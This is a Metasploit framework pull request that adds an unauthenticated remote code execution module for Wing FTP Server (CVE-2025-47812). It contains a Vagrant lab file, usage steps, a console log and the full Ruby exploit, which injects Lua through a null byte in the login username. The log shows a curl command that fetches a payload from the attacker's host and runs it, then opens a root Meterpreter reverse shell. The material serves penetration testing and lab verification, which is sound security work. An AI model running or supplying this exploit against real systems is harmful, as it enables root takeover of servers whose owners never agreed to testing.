Land #20364, adds WingFTP unauthenticated RCE module

Add WingFTP unauthenticated RCE (CVE-2025-47812)

Author: msutovsky-r7

documentation/modules/exploit/multi/http/wingftp_null_byte_rce.md

@@ -0,0 +1,161 @@
+## Vulnerable Application
+
+This Metasploit module exploits an **unauthenticated Remote Code Execution** vulnerability
+in **Wing FTP Server** (≤ 7.4.3 on Linux 64-bit), via its web administration interface.
+The flaw lies in the login handler (`loginok.html`): by injecting a null byte (`%00`) into
+the `username` parameter, attacker-supplied Lua code is written into the session file and
+then executed by `loadfile()`, yielding arbitrary code execution as **root**.
+
+To set up a vulnerable lab, use the following **Vagrantfile**, which provisions a Debian
+"bookworm" VM, installs Wing FTP Server 7.4.3, and exposes its HTTP/S and FTP ports on the host:
+
+```ruby
+Vagrant.configure("2") do |config|
+  config.vm.box = "debian/bookworm64"
+
+  if Vagrant.has_plugin?("vagrant-vbguest")
+    config.vbguest.auto_update = false
+  end
+
+  {
+    21    => 2121,   # FTP
+    990   => 2990,   # FTPS
+    5466  => 5466,   # Admin port WingFTP
+    50000 => 50000,  # Passive FTP range start
+    50050 => 50050,  # Passive FTP range end
+    80    => 8081    # HTTP WingFTP Web GUI
+  }.each do |guest, host|
+    config.vm.network "forwarded_port",
+                      guest:        guest,
+                      host:         host,
+                      host_ip:      "0.0.0.0",
+                      auto_correct: true
+  end
+
+  config.vm.provision "shell", inline: <<-SHELL
+#!/usr/bin/env bash
+set -e
+
+ADMIN_USER="admin"
+ADMIN_PASS="adminadmin"
+ADMIN_PORT="5466"
+WFTP_URL="https://web.archive.org/web/20250108084555/https://www.wftpserver.com/download/wftpserver-linux-64bit.tar.gz"
+
+apt-get update
+DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
+  wget ca-certificates libssl3 libpam0g libacl1 libcap2 \
+  net-tools procps expect curl \
+  linux-headers-amd64 build-essential dkms
+
+mkdir -p /opt/wingftp
+cd /opt/wingftp
+wget -qO wftp.tar.gz "$WFTP_URL"
+tar xzf wftp.tar.gz --strip-components=1
+rm wftp.tar.gz
+chmod +x setup.sh
+
+expect -c "
+  spawn /opt/wingftp/setup.sh
+  expect \\\"Enter your administrator name:\\\"     { send \\\"${ADMIN_USER}\\r\\\" }
+  expect \\\"Enter your administrator password:\\\" { send \\\"${ADMIN_PASS}\\r\\\" }
+  expect \\\"Enter your administrator password:\\\" { send \\\"${ADMIN_PASS}\\r\\\" }
+  expect \\\"Enter the listener port\\\"           { send \\\"${ADMIN_PORT}\\r\\\" }
+  expect \\\"Do you want to start Wing FTP Server now?\\\" { send \\\"y\\r\\\" }
+  expect eof
+"
+
+systemctl daemon-reload
+systemctl enable wftpserver.service
+systemctl start wftpserver.service
+SHELL
+
+  config.vm.provider "virtualbox" do |vb|
+    vb.memory = 512
+    vb.cpus   = 1
+  end
+end
+```
+
+* Save this as Vagrantfile in an empty directory.
+* Run vagrant up.
+* After provisioning, access the Wing FTP Server web UI at http://localhost:5466/ with credentials admin/adminadmin.
+* On first login, a popup will appear; click OK.
+* Create a new domain in the admin interface (this will enable the web client panel, port 8081).
+* Then create a new user; for simplicity, use anonymous.
+
+
+## Verification Steps
+
+1. Start `msfconsole`.
+2. Load the module:
+```
+use exploit/multi/http/wingftp_null_byte_rce
+```
+3. Set target parameters:
+```
+set RHOSTS 127.0.0.1
+set RPORT 8081
+set TARGETURI /
+```
+4. Configure payload:
+```
+set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+set LHOST <your IP>
+set LPORT <your port>
+```
+5. Run the exploit:
+```
+run
+```
+6. On success, a Meterpreter session will open, confirming remote code execution.
+
+
+## Options
+
+### USERNAME
+
+A valid username (default: anonymous)
+
+### PASSWORD
+
+A valid password (default: '')
+
+
+## Scenarios
+
+### Successful Exploitation against Wing FTP Server
+
+**Setup**:
+
+* Wing FTP Server running in the Vagrant VM above.
+* Attacker on host machine with Metasploit.
+
+**Steps**:
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```
+msf6 exploit(multi/http/wingftp_null_byte_rce) > run http://lab:8081
+[*] Command to run on remote host: curl -so ./FaWVivODJhB http://192.168.1.36:9999/LoPlnjEpeOexZNVppn6cAA;chmod +x ./FaWVivODJhB;./FaWVivODJhB&
+[*] Fetch handler listening on 192.168.1.36:9999
+[*] HTTP server started
+[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. UID cookie received: UID=2a5efb5a398e4ff19369a523c3cfffb03683e20446a6b40715757e2b05f10521
+[+] Received UID: UID=146015b242094d8f4eff04941d94e67d3683e20446a6b40715757e2b05f10521
+[*] Client 192.168.1.36 requested /LoPlnjEpeOexZNVppn6cAA
+[*] Sending payload to 192.168.1.36 (curl/7.88.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.1.36
+[*] Meterpreter session 7 opened (192.168.1.36:4444 -> 192.168.1.36:46260) at 2025-07-01 18:56:31 +0200
+
+meterpreter > sysinfo 
+Computer     : 10.0.2.15
+OS           : Debian 12.9 (Linux 6.1.0-37-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+```

modules/exploits/multi/http/wingftp_null_byte_rce.rb

@@ -0,0 +1,148 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)',
+        'Description' => %q{
+          Wing FTP Server allows arbitrary Lua code injection via a NULL-byte (%00) truncation bug (CVE-2025-47812).
+          Supplying <valid-user>%00<lua-payload> as the username makes the C++ authentication routine validate only the prefix,
+          while the full string is written unfiltered into the session file and later executed with root/SYSTEM privileges,
+          leading to Remote Code Execution.
+        },
+        'Author' => [
+          'Valentin Lobstein',   # Metasploit Module
+          'Julien Ahrens'        # Vulnerability Discovery
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-47812'],
+          ['URL', 'https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/']
+        ],
+        'Platform' => %w[unix linux win],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix/Linux Command Shell', {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows Command Shell', {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => true,
+        'DisclosureDate' => '2025-06-30',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'Valid username for authentication', 'anonymous' ]),
+        OptString.new('PASSWORD', [ false, 'Password for authentication', '' ])
+      ]
+    )
+  end
+
+  def uid_cookie(res)
+    res&.get_cookies_parsed&.[]('UID')
+  end
+
+  def post_login(username, password)
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'loginok.html'),
+      'uri_encode_mode' => 'none',
+      'headers' => {
+        'Referer' => normalize_uri(target_uri.path, 'login.html') + '?lang=english'
+      },
+      'vars_post' => {
+        'username' => username,
+        'password' => password,
+        'username_val' => username.split('%00').first,
+        'password_val' => password
+      }
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.html')
+    )
+    return CheckCode::Safe('Not a Wing FTP Web Client') unless res&.body&.include?('Wing FTP Server - Web Client')
+
+    if (ver_str = res.body[/Wing FTP Server v([\d.]+)/i, 1])
+      ver = Rex::Version.new(ver_str)
+      return ver < Rex::Version.new('7.4.4') ? CheckCode::Vulnerable("Detected version #{ver} ≤ 7.4.4") : CheckCode::Safe("Detected version #{ver} > 7.4.4")
+    end
+
+    suffix = Rex::Text.rand_text_alpha(8)
+    user = datastore['USERNAME']
+    pass = datastore['PASSWORD']
+
+    res2 = post_login("#{user}%00#{suffix}", pass)
+    return CheckCode::Unknown('No response') unless res2
+
+    if uid_cookie(res2)
+      CheckCode::Appears('UID cookie received')
+    else
+      CheckCode::Safe('UID cookie not found; not vulnerable')
+    end
+  end
+
+  def exploit
+    user = datastore['USERNAME']
+    pass = datastore['PASSWORD']
+    hex = payload.encoded.unpack('H*').first
+
+    lua = <<~LUA
+      ]]
+      local function hx(s)#{' '}
+        return (s:gsub('..', function(x)#{' '}
+          return string.char(tonumber(x,16))#{' '}
+        end))#{' '}
+      end
+      local cmd = hx("#{hex}")
+      local h = io.popen(cmd)
+      h:close()
+    LUA
+
+    inj = "#{user}%00" + Rex::Text.uri_encode(lua).gsub('%0a', '%0d') + '--'
+
+    res = post_login(inj, pass)
+    fail_with(Failure::UnexpectedReply, 'Injection failed') unless res&.code == 200
+
+    uid = res.get_cookies_parsed.fetch('UID', nil)
+    fail_with(Failure::UnexpectedReply, 'UID cookie not returned') unless uid
+    print_good("Received UID: #{uid}, injection succeeded")
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'dir.html'),
+      'headers' => { 'Cookie' => uid }
+    )
+  end
+end